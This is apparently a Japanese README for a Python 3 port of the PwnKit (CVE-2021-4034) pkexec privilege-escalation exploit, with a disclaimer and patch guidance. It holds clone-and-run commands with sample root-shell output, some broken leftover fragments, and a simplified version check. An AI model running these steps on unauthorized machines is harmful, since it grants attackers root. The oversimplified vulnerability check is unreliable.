
PwnKit(CVE-2021-4034)エクスプロイトのPython3版アップデートです。このCVEは、pkexec(polkitの一部)に存在するメモリ破壊の脆弱性を悪用し、ローカルユーザーが権限を昇格させるものです。
元のエクスプロイトはKim S. J.(ユーザー名: Flow)氏によって作成され、C言語で書かれていましたが、このPython3版ではよりシンプルな利用と多環境での互換性を提供します。
pkexecバイナリ# Pythonバージョンの確認
python3 --version
# リポジトリをクローン
git clone https://github.com/yourusername/CVE-2021-4034_Python3.git
cd CVE-2021-4034_Python3
# エクスプロイトを実行
python3 exploit.py
正常に実行されると、pkexecが実行され、root権限のシェルが表示されます。
# ルート権限の確認
whoami
# 出力: root
id
# 出力: uid=0(root) gid=0(root) groups=0(root)
docker pull docker.io/andresbelizario/ubuntu
docker run -it --rm andresbelizario/ubuntu
以下のLinuxディストリビューションは、この脆弱性の影響を受けます:
システムが脆弱かどうかを確認するには:
pkexec --version
# バージョンが0.120未満の場合、脆弱性の影響を受けます
polkitを最新バージョンに更新してください:
# Ubuntu/Debian
sudo apt update && sudo apt upgrade polkit
# RHEL/CentOS
sudo yum update polkit
# Fedora
sudo dnf update polkit
このツールは教育および研究目的のみで提供されています。 このエクスプロイトを許可なくシステムに対して使用することは違法となる場合があります。作成者は、このツールの不正使用によって生じたいかなる損害についても責任を負いません。必ず、自分が所有するシステムまたは許可を得た環境でのみ使用してください。
このプロジェクトはMITライセンスの下で提供されています。詳細はLICENSEファイルを参照してください。